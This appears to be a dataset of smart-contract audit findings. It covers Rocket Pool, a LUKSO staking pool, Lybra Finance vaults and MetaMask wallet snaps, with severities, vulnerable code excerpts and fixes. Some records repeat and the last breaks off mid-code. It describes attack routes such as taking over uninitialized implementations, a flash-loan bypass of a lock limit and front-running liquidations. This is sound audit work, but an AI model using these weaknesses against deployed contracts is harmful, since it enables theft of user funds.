DocumentationчlowчThe NatSpec documentation in several parts of the code base contains inaccuracies or is misleading. This issue can lead to misunderstandings about how the code functions, especially for developers who rely on these comments for clarity and guidance.\\nIn `RocketDAOProtocolProposal`, the NatSpec comments are potentially misleading:\\n```\\n/// @notice Get the votes against count of this proposal\\n/// @param _proposalID The ID of the proposal to query\\n```\\n\\n```\\n/// @notice Returns true if this proposal was supported by this node\\n/// @param _proposalID The ID of the proposal to query\\n/// @param _nodeAddress The node operator address to query\\nfunction getReceiptDirection(uint256 _proposalID, address _nodeAddress) override public view returns (VoteDirection) {\\n return VoteDirection(getUint(keccak256(abi.encodePacked(daoProposalNameSpace, \"receipt.direction\", _proposalID, _nodeAddress))));\\n}\\n```\\n\\nIn RocketDAOProtocolVerifier, the NatSpec documentation is incomplete, which might leave out critical information about the function's purpose and behavior:\\n```\\n/// @notice Used by a verifier to challenge a specific index of a proposal's voting power tree\\n/// @param _proposalID The ID of the proposal being challenged\\n/// @param _index The global index of the node being challenged\\n```\\nчThe NatSpec documentation should be thoroughly reviewed and corrected where necessary. We recommend ensuring it accurately reflects the code's functionality and provides complete information.чч```\\n/// @notice Get the votes against count of this proposal\\n/// @param _proposalID The ID of the proposal to query\\n```\\n -RocketDAOProtocolSettingsRewards.setSettingRewardClaimPeriods() Cannot Be Invokedчlowч```\\nsetUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"periods\")), _periods);\\n```\\nчTo make this function useful and align it with its intended purpose, we recommend integrating its functionality into `RocketDAOProtocolProposals`. In addition, we recommend that this function emit an event upon successful change of settings, enhancing the transparency of the operation.чч```\\nsetUint(keccak256(abi.encodePacked(settingNameSpace, \"rewards.claims\", \"periods\")), _periods);\\n```\\n -No Protection of Uninitialized Implementation Contracts From AttackerчmediumчIn the contracts implement Openzeppelin's UUPS model, uninitialized implementation contract can be taken over by an attacker with `initialize` function, it's recommended to invoke the `_disableInitializers` function in the constructor to prevent the implementation contract from being used by the attacker. However all the contracts which implements `OwnablePausableUpgradeable` do not call `_disableInitializers` in the constructors\\n```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract Pool is IPool, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract StakedLyxToken is OwnablePausableUpgradeable, LSP4DigitalAssetMetadataInitAbstract, IStakedLyxToken, ReentrancyGuardUpgradeable {\\n```\\n\\netc.чInvoke `_disableInitializers` in the constructors of contracts which implement `OwnablePausableUpgradeable` including following:\\n```\\nPool\\nPoolValidators\\nFeeEscrow\\nReward\\nStakeLyxTokem\\nOracles \\nMerkleDistributor\\n```\\nчч```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n -Unsafe Function receiveFees AcknowledgedчlowчIn the Pool contract, function `receiveFees` is used for compensate a potential penalty/slashing in the protocol by sending LYX back to the pool without minting sLYX, but the side effect is that anyone can send LYX to the pool which could mess up pool balance after all validator exited, in fact it can be replaced by a another function `receiveWithoutActivation` with access control which does the same thing.\\n```\\nfunction receiveFees() external payable override {}\\n```\\n\\n```\\nfunction receiveWithoutActivation() external payable override {\\n require(msg.sender == address(stakedLyxToken) || hasRole(DEFAULT\\_ADMIN\\_ROLE, msg.sender), \"Pool: access denied\");\\n}\\n```\\nчRemove function `receiveFees`чч```\\nfunction receiveFees() external payable override {}\\n```\\n -Unnecessary Matching in Unstake ProcessчlowчFunction `unstakeProcessed` in `StakedLyxToken` contract, when `unstakeAmount > totalPendingUnstake`, all the unstake requests should be able to be processed, thus no need to go through the matching, as a result, extra gas in the matching can be saved.\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\nчPut the matching part (line 393-411) into else branch of `if unstakeAmount > totalPendingUnstake`, change the if branch into following:\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n totalPendingUnstake = 0;\\n unstakeRequestCurrentIndex = unstakeRequestCount;\\n _unstakeRequests[unstakeRequestCount].amountFilled = _unstakeRequests[unstakeRequestCount].amount;\\n } \\n```\\nчч```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n -No Protection of Uninitialized Implementation Contracts From AttackerчmediumчIn the contracts implement Openzeppelin's UUPS model, uninitialized implementation contract can be taken over by an attacker with `initialize` function, it's recommended to invoke the `_disableInitializers` function in the constructor to prevent the implementation contract from being used by the attacker. However all the contracts which implements `OwnablePausableUpgradeable` do not call `_disableInitializers` in the constructors\\n```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract Pool is IPool, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n\\n```\\ncontract StakedLyxToken is OwnablePausableUpgradeable, LSP4DigitalAssetMetadataInitAbstract, IStakedLyxToken, ReentrancyGuardUpgradeable {\\n```\\n\\netc.чInvoke `_disableInitializers` in the constructors of contracts which implement `OwnablePausableUpgradeable` including following:\\n```\\nPool\\nPoolValidators\\nFeeEscrow\\nReward\\nStakeLyxTokem\\nOracles \\nMerkleDistributor\\n```\\nчч```\\ncontract Rewards is IRewards, OwnablePausableUpgradeable, ReentrancyGuardUpgradeable {\\n```\\n -Unnecessary Matching in Unstake ProcessчlowчFunction `unstakeProcessed` in `StakedLyxToken` contract, when `unstakeAmount > totalPendingUnstake`, all the unstake requests should be able to be processed, thus no need to go through the matching, as a result, extra gas in the matching can be saved.\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\nчPut the matching part (line 393-411) into else branch of `if unstakeAmount > totalPendingUnstake`, change the if branch into following:\\n```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n totalPendingUnstake = 0;\\n unstakeRequestCurrentIndex = unstakeRequestCount;\\n _unstakeRequests[unstakeRequestCount].amountFilled = _unstakeRequests[unstakeRequestCount].amount;\\n } \\n```\\nчч```\\nif (unstakeAmount > totalPendingUnstake) {\\n pool.receiveWithoutActivation{value: unstakeAmount - totalPendingUnstake}();\\n unstakeAmount = totalPendingUnstake;\\n}\\n\\ntotalPendingUnstake -= unstakeAmount;\\ntotalUnstaked += unstakeAmount;\\nuint256 amountToFill = unstakeAmount;\\n\\nfor (uint256 i = unstakeRequestCurrentIndex; i <= unstakeRequestCount; i++) {\\n UnstakeRequest storage request = \\_unstakeRequests[i];\\n if (amountToFill > (request.amount - request.amountFilled)) {\\n amountToFill -= (request.amount - request.amountFilled);\\n continue;\\n } else {\\n if (amountToFill == (request.amount - request.amountFilled) && i < unstakeRequestCount) {\\n unstakeRequestCurrentIndex = i + 1;\\n } else {\\n request.amountFilled += uint128(amountToFill);\\n unstakeRequestCurrentIndex = i;\\n }\\n break;\\n }\\n}\\n```\\n -Re-Entrancy Risks Associated With External Calls With Other Liquid Staking Systems.чhighчAs part of the strategy to integrate with Liquid Staking tokens for Ethereum staking, the Lybra Protocol vaults are required to make external calls to Liquid Staking systems.\\nFor example, the `depositEtherToMint` function in the vaults makes external calls to deposit Ether and receive the LSD tokens back. While external calls to untrusted third-party contracts may be dangerous, in this case, the Lybra Protocol already extends trust assumptions to these third parties simply through the act of accepting their tokens as collateral. Indeed, in some cases the contract addresses are even hardcoded into the contract and called directly instead of relying on some registry:\\n```\\ncontract LybraWstETHVault is LybraPeUSDVaultBase {\\n Ilido immutable lido;\\n //WstETH = 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0;\\n //Lido = 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84;\\n constructor(address \\_lido, address \\_asset, address \\_oracle, address \\_config) LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {\\n lido = Ilido(\\_lido);\\n }\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, \"DNL\");\\n uint256 sharesAmount = lido.submit{value: msg.value}(address(configurator));\\n require(sharesAmount != 0, \"ZERO\\_DEPOSIT\");\\n lido.approve(address(collateralAsset), msg.value);\\n uint256 wstETHAmount = IWstETH(address(collateralAsset)).wrap(msg.value);\\n depositedAsset[msg.sender] += wstETHAmount;\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,wstETHAmount, block.timestamp);\\n }\\n```\\n\\nIn that case, depending on the contract, it may be known what contract is being called, and the risk may be assessed as far as what logic may be executed.\\nHowever, in the cases of `BETH` and `rETH`, the calls are being made into a proxy and a contract registry of a DAO (RocketPool's DAO) respectively.\\n```\\ncontract LybraWBETHVault is LybraPeUSDVaultBase {\\n //WBETH = 0xa2e3356610840701bdf5611a53974510ae27e2e1\\n constructor(address \\_asset, address \\_oracle, address \\_config)\\n LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {}\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, \"DNL\");\\n uint256 preBalance = collateralAsset.balanceOf(address(this));\\n IWBETH(address(collateralAsset)).deposit{value: msg.value}(address(configurator));\\n uint256 balance = collateralAsset.balanceOf(address(this));\\n depositedAsset[msg.sender] += balance - preBalance;\\n\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,balance - preBalance, block.timestamp);\\n }\\n```\\n\\n```\\nconstructor(address \\_rocketStorageAddress, address \\_rETH, address \\_oracle, address \\_config)\\n LybraPeUSDVaultBase(\\_rETH, \\_oracle, \\_config) {\\n rocketStorage = IRocketStorageInterface(\\_rocketStorageAddress);\\n}\\n\\nfunction depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, \"DNL\");\\n uint256 preBalance = collateralAsset.balanceOf(address(this));\\n IRocketDepositPool(rocketStorage.getAddress(keccak256(abi.encodePacked(\"contract.address\", \"rocketDepositPool\")))).deposit{value: msg.value}();\\n uint256 balance = collateralAsset.balanceOf(address(this));\\n depositedAsset[msg.sender] += balance - preBalance;\\n\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,balance - preBalance, block.timestamp);\\n}\\n```\\n\\nAs a result, it is impossible to make any guarantees for what logic will be executed during the external calls. Namely, reentrancy risks can't be ruled out, and the damage could be critical to the system. While the trust in these parties isn't in question, it would be best practice to avoid any additional reentrancy risks by placing reentrancy guards. Indeed, in the `LybraRETHVault` and `LybraWbETHVault` contracts, one can see the possible damage as the calls are surrounded in a `preBalance <-> balance` pattern.\\nThe whole of third party Liquid Staking systems' operations need not be compromised, only these particular parts would be enough to cause critical damage to the Lybra Protocol.чAfter conversations with the Lybra Finance team, it has been assessed that reentrancy guards are appropriate in this scenario to avoid any potential reentrancy risk, which is exactly the recommendation this audit team would provide.чч```\\ncontract LybraWstETHVault is LybraPeUSDVaultBase {\\n Ilido immutable lido;\\n //WstETH = 0x7f39C581F595B53c5cb19bD0b3f8dA6c935E2Ca0;\\n //Lido = 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84;\\n constructor(address \\_lido, address \\_asset, address \\_oracle, address \\_config) LybraPeUSDVaultBase(\\_asset, \\_oracle, \\_config) {\\n lido = Ilido(\\_lido);\\n }\\n\\n function depositEtherToMint(uint256 mintAmount) external payable override {\\n require(msg.value >= 1 ether, \"DNL\");\\n uint256 sharesAmount = lido.submit{value: msg.value}(address(configurator));\\n require(sharesAmount != 0, \"ZERO\\_DEPOSIT\");\\n lido.approve(address(collateralAsset), msg.value);\\n uint256 wstETHAmount = IWstETH(address(collateralAsset)).wrap(msg.value);\\n depositedAsset[msg.sender] += wstETHAmount;\\n if (mintAmount > 0) {\\n \\_mintPeUSD(msg.sender, msg.sender, mintAmount, getAssetPrice());\\n }\\n emit DepositEther(msg.sender, address(collateralAsset), msg.value,wstETHAmount, block.timestamp);\\n }\\n```\\n -The Deployer of GovernanceTimelock Gets Privileged Access to the System.чhighчThe `GovernanceTimelock` contract is responsible for Roles Based Access Control management and checks in the Lybra Protocol. It offers two functions specifically that check if an address has the required role - `checkRole` and checkOnlyRole:\\n```\\nfunction checkRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender) || hasRole(DAO, \\_sender);\\n}\\n\\nfunction checkOnlyRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender);\\n}\\n```\\n\\nIn `checkRole`, the contract also lets an address with the role `DAO` bypass the check altogether, making it a powerful role.\\nFor initial role management, when the `GovernanceTimelock` contract gets deployed, its constructor logic initializes a few roles, assigns relevant admin roles, and, notably, assigns the `DAO` role to the contract, and the `DAO` and the `GOV` role to the deployer.\\n```\\nconstructor(uint256 minDelay, address[] memory proposers, address[] memory executors, address admin) TimelockController(minDelay, proposers, executors, admin) {\\n \\n \\_setRoleAdmin(DAO, GOV);\\n \\_setRoleAdmin(TIMELOCK, GOV);\\n \\_setRoleAdmin(ADMIN, GOV);\\n \\_grantRole(DAO, address(this));\\n \\_grantRole(DAO, msg.sender);\\n \\_grantRole(GOV, msg.sender);\\n}\\n```\\n\\nThe assignment of such powerful roles to a single private key with the deployer has inherent risks. Specifically in our case, the `DAO` role alone as we saw may bypass many checks within the Lybra Protocol, and the `GOV` role even has role management privileges.\\nHowever, it does make sense to assign such roles at the beginning of the deployment to finish initialization and assign the rest of the roles. One could argue that having access to the `DAO` role in the early stages of the system's life could allow for quick disaster recovery in the event of incidents as well. Though, it is still dangerous to hold privileges for such a system in a single address as we have seen over the last years in security incidents that have to do with compromised keys.чWhile redesigning the deployment process to account for a lesser-privileged deployer would be ideal, the Lybra Finance team should at least transfer ownership as soon as the deployment is complete to minimize compromised private key risk.чч```\\nfunction checkRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender) || hasRole(DAO, \\_sender);\\n}\\n\\nfunction checkOnlyRole(bytes32 role, address \\_sender) public view returns(bool){\\n return hasRole(role, \\_sender);\\n}\\n```\\n -The configurator.getEUSDMaxLocked() Condition Can Be Bypassed During a FlashloanчmediumчWhen converting `EUSD` tokens to `peUSD`, there is a check that limits the total amount of `EUSD` that can be converted:\\n```\\nfunction convertToPeUSD(address user, uint256 eusdAmount) public {\\n require(\\_msgSender() == user || \\_msgSender() == address(this), \"MDM\");\\n require(eusdAmount != 0, \"ZA\");\\n require(EUSD.balanceOf(address(this)) + eusdAmount <= configurator.getEUSDMaxLocked(),\"ESL\");\\n```\\n\\nThe issue is that there is a way to bypass this restriction. An attacker can get a flash loan (in EUSD) from this contract, essentially reducing the visible amount of locked tokens (EUSD.balanceOf(address(this))).чMultiple approaches can solve this issue. One would be adding reentrancy protection. Another one could be keeping track of the borrowed amount for a flashloan.чч```\\nfunction convertToPeUSD(address user, uint256 eusdAmount) public {\\n require(\\_msgSender() == user || \\_msgSender() == address(this), \"MDM\");\\n require(eusdAmount != 0, \"ZA\");\\n require(EUSD.balanceOf(address(this)) + eusdAmount <= configurator.getEUSDMaxLocked(),\"ESL\");\\n```\\n -Liquidation Keepers Automatically Become eUSD Debt Providers for Other Liquidations.чmediumчOne of the most important mechanisms in the Lybra Protocol is the liquidation of poorly collateralized vaults. For example, if a vault is found to have a collateralization ratio that is too small, a liquidator may provide debt tokens to the protocol and retrieve the vault collateral at a discount:\\n```\\nfunction liquidation(address provider, address onBehalfOf, uint256 assetAmount) external virtual {\\n uint256 assetPrice = getAssetPrice();\\n uint256 onBehalfOfCollateralRatio = (depositedAsset[onBehalfOf] \\* assetPrice \\* 100) / borrowed[onBehalfOf];\\n require(onBehalfOfCollateralRatio < badCollateralRatio, \"Borrowers collateral ratio should below badCollateralRatio\");\\n\\n require(assetAmount \\* 2 <= depositedAsset[onBehalfOf], \"a max of 50% collateral can be liquidated\");\\n require(EUSD.allowance(provider, address(this)) != 0, \"provider should authorize to provide liquidation EUSD\");\\n uint256 eusdAmount = (assetAmount \\* assetPrice) / 1e18;\\n\\n \\_repay(provider, onBehalfOf, eusdAmount);\\n uint256 reducedAsset = assetAmount \\* 11 / 10;\\n totalDepositedAsset -= reducedAsset;\\n depositedAsset[onBehalfOf] -= reducedAsset;\\n uint256 reward2keeper;\\n if (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n } else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, reward2keeper);\\n }\\n emit LiquidationRecord(provider, msg.sender, onBehalfOf, eusdAmount, reducedAsset, reward2keeper, false, block.timestamp);\\n}\\n```\\n\\nTo liquidate the vault, the liquidator needs to transfer debt tokens from the provider address, which in turn needs to have had approved allowance of the token for the vault:\\n```\\nrequire(EUSD.allowance(provider, address(this)) != 0, \"provider should authorize to provide liquidation EUSD\");\\n```\\n\\nThe allowance doesn't need to be large, it only needs to be non-zero. While it is true that in the `superLiquidation` function the allowance check is for `eusdAmount`, which is the amount associated with `assetAmount` (the requested amount of collateral to be liquidated), the liquidator could simply call the maximum of the allowance the provider has given to the vault and then repeat the liquidation process. The allowance does not actually decrease throughout the liquidation process.\\n```\\nrequire(EUSD.allowance(provider, address(this)) >= eusdAmount, \"provider should authorize to provide liquidation EUSD\");\\n```\\n\\nNotably, this address doesn't have to be the same one as the liquidator. In fact, there are no checks on whether the liquidator has an agreement or allowance from the provider to use their tokens in this particular vault's liquidation. The contract only checks to see if the provider has `EUSD` allowance for the vault, and how to split the rewards if the provider is different from the liquidator:\\n```\\nif (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n} else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, reward2keeper);\\n}\\n```\\n\\nIn fact, this is a design choice of the system to treat the allowance to the vault as an agreement to become a public provider of debt tokens for the liquidation process. It is important to note that there are incentives associated with being a provider as they get the collateral asset at a discount.\\nHowever, it is not obvious from documentation at the time of the audit nor the code that an address having a non-zero `EUSD` allowance for the vault automatically allows other users to use that address as a provider. Indeed, many general-purpose liquidator bots use their tokens during liquidations, using the same address for both the liquidator and the provider. As a result, this would put that address at the behest of any other user who would want to utilize these tokens in liquidations. The user might not be comfortable doing this trade in any case, even at a discount.\\nIn fact, due to this mechanism, even during consciously initiated liquidations MEV bots could spot this opportunity and front-run the liquidator's transaction. A frontrunner could put themselves as the keeper and the original user as the provider, grabbing the `reward2keeper` fee and leaving the original address with fewer rewards and failed gas after the liquidation.чWhile the mechanism is understood to be done for convenience and access to liquidity as a design decision, this could put unaware users in unfortunate situations of having performed a trade without explicit consent. Specifically, the MEV attack vector could be executed and repeated without fail by a capable actor monitoring the mempool. Consider having a separate, explicit flag for allowing others to use a user's tokens during liquidation, thus also accommodating solo liquidators by removing the MEV attack vector. Consider explicitly mentioning these mechanisms in the documentation as well.чч```\\nfunction liquidation(address provider, address onBehalfOf, uint256 assetAmount) external virtual {\\n uint256 assetPrice = getAssetPrice();\\n uint256 onBehalfOfCollateralRatio = (depositedAsset[onBehalfOf] \\* assetPrice \\* 100) / borrowed[onBehalfOf];\\n require(onBehalfOfCollateralRatio < badCollateralRatio, \"Borrowers collateral ratio should below badCollateralRatio\");\\n\\n require(assetAmount \\* 2 <= depositedAsset[onBehalfOf], \"a max of 50% collateral can be liquidated\");\\n require(EUSD.allowance(provider, address(this)) != 0, \"provider should authorize to provide liquidation EUSD\");\\n uint256 eusdAmount = (assetAmount \\* assetPrice) / 1e18;\\n\\n \\_repay(provider, onBehalfOf, eusdAmount);\\n uint256 reducedAsset = assetAmount \\* 11 / 10;\\n totalDepositedAsset -= reducedAsset;\\n depositedAsset[onBehalfOf] -= reducedAsset;\\n uint256 reward2keeper;\\n if (provider == msg.sender) {\\n collateralAsset.safeTransfer(msg.sender, reducedAsset);\\n } else {\\n reward2keeper = (reducedAsset \\* configurator.vaultKeeperRatio(address(this))) / 110;\\n collateralAsset.safeTransfer(provider, reducedAsset - reward2keeper);\\n collateralAsset.safeTransfer(msg.sender, reward2keeper);\\n }\\n emit LiquidationRecord(provider, msg.sender, onBehalfOf, eusdAmount, reducedAsset, reward2keeper, false, block.timestamp);\\n}\\n```\\n -Use the Same Solidity Version Across Contracts.чlowчMost contracts use the same Solidity version with `pragma solidity ^0.8.17`. The only exception is the `StakingRewardsV2` contract which has `pragma solidity ^0.8`.\\n```\\npragma solidity ^0.8;\\n```\\nчIf all contracts will be tested and utilized together, it would be best to utilize and document the same version within all contract code to avoid any issues and inconsistencies that may arise across Solidity versions.чч```\\npragma solidity ^0.8;\\n```\\n -Missing Events.чlowчIn a few cases in the Lybra Protocol system, there are contracts that are missing events in significant scenarios, such as important configuration changes like a price oracle change. Consider implementing more events in the below examples.\\nNo events in the contract:\\n```\\ncontract esLBRBoost is Ownable {\\n esLBRLockSetting[] public esLBRLockSettings;\\n mapping(address => LockStatus) public userLockStatus;\\n IMiningIncentives public miningIncentives;\\n\\n // Define a struct for the lock settings\\n struct esLBRLockSetting {\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Define a struct for the user's lock status\\n struct LockStatus {\\n uint256 lockAmount;\\n uint256 unlockTime;\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Constructor to initialize the default lock settings\\n constructor(address \\_miningIncentives) {\\n```\\n\\nMissing an event during a premature unlock:\\n```\\nfunction unlockPrematurely() external {\\n require(block.timestamp + exitCycle - 3 days > time2fullRedemption[msg.sender], \"ENW\");\\n uint256 burnAmount = getReservedLBRForVesting(msg.sender) - getPreUnlockableAmount(msg.sender);\\n uint256 amount = getPreUnlockableAmount(msg.sender) + getClaimAbleLBR(msg.sender);\\n if (amount > 0) {\\n LBR.mint(msg.sender, amount);\\n }\\n unstakeRatio[msg.sender] = 0;\\n time2fullRedemption[msg.sender] = 0;\\n grabableAmount += burnAmount;\\n}\\n```\\n\\nMissing events for setting important configurations such as `setToken`, `setLBROracle`, and setPools:\\n```\\nfunction setToken(address \\_lbr, address \\_eslbr) external onlyOwner {\\n LBR = \\_lbr;\\n esLBR = \\_eslbr;\\n}\\n\\nfunction setLBROracle(address \\_lbrOracle) external onlyOwner {\\n lbrPriceFeed = AggregatorV3Interface(\\_lbrOracle);\\n}\\n\\nfunction setPools(address[] memory \\_vaults) external onlyOwner {\\n require(\\_vaults.length <= 10, \"EL\");\\n for (uint i = 0; i < \\_vaults.length; i++) {\\n require(configurator.mintVault(\\_vaults[i]), \"NOT\\_VAULT\");\\n }\\n vaults = \\_vaults;\\n}\\n```\\n\\nMissing events for setting important configurations such as `setRewardsDuration` and setBoost:\\n```\\n// Allows the owner to set the rewards duration\\nfunction setRewardsDuration(uint256 \\_duration) external onlyOwner {\\n require(finishAt < block.timestamp, \"reward duration not finished\");\\n duration = \\_duration;\\n}\\n\\n// Allows the owner to set the boost contract address\\nfunction setBoost(address \\_boost) external onlyOwner {\\n esLBRBoost = IesLBRBoost(\\_boost);\\n}\\n```\\n\\nMissing event during what is essentially staking `LBR` into `esLBR` (such as in ProtocolRewardsPool.stake()). Consider an appropriate event here such as StakeLBR:\\n```\\nif(useLBR) {\\n IesLBR(miningIncentives.LBR()).burn(msg.sender, lbrAmount);\\n IesLBR(miningIncentives.esLBR()).mint(msg.sender, lbrAmount);\\n}\\n```\\nчImplement additional events as appropriate.чч```\\ncontract esLBRBoost is Ownable {\\n esLBRLockSetting[] public esLBRLockSettings;\\n mapping(address => LockStatus) public userLockStatus;\\n IMiningIncentives public miningIncentives;\\n\\n // Define a struct for the lock settings\\n struct esLBRLockSetting {\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Define a struct for the user's lock status\\n struct LockStatus {\\n uint256 lockAmount;\\n uint256 unlockTime;\\n uint256 duration;\\n uint256 miningBoost;\\n }\\n\\n // Constructor to initialize the default lock settings\\n constructor(address \\_miningIncentives) {\\n```\\n -Incorrect InterfacesчlowчIn a few cases, incorrect interfaces are used on top of contracts. Though the effect is the same as the contracts are just tokens and follow the same interfaces, it is best practice to implement correct interfaces.\\n`IPeUSD` is used instead of `IEUSD`\\n```\\nIPeUSD public EUSD;\\n```\\n\\n`IPeUSD` is used instead of `IEUSD`\\n```\\nif (address(EUSD) == address(0)) EUSD = IPeUSD(\\_eusd);\\n```\\n\\n`IesLBR` instead of `ILBR`\\n```\\nIesLBR public LBR;\\n```\\n\\n`IesLBR` instead of `ILBR`\\n```\\nLBR = IesLBR(\\_lbr);\\n```\\nчImplement correct interfaces for consistency.чч```\\nIPeUSD public EUSD;\\n```\\n -Production Builds Allow Development and Localhost Origins; Snap Does Not Enforce Transport SecurityчmediumчThe snaps RPC access is restricted to certain origins only. However, there is no logic that disables development/test domains from origin checks in production builds.\\nSolflare Snap\\n../solflare-snap/src/index.js:L7-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nAptos Snap\\n../aptos-snap/src/index.js:L6-L15\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?risewallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nSui Snap\\n../sui-snap/src/index.js:L8-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?elliwallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\nчImplement logic that removes development/localhost origin from the allow list for production builds. Employ strict checks on the format of provided origin. Do not by default allow all subdomains.чч```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n -Production Builds Allow Development and Localhost Origins; Snap Does Not Enforce Transport Security Partially AddressedчmediumчThe snaps RPC access is restricted to certain origins only. However, there is no logic that disables development/test domains from origin checks in production builds.\\nSolflare Snap\\n../solflare-snap/src/index.js:L7-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n 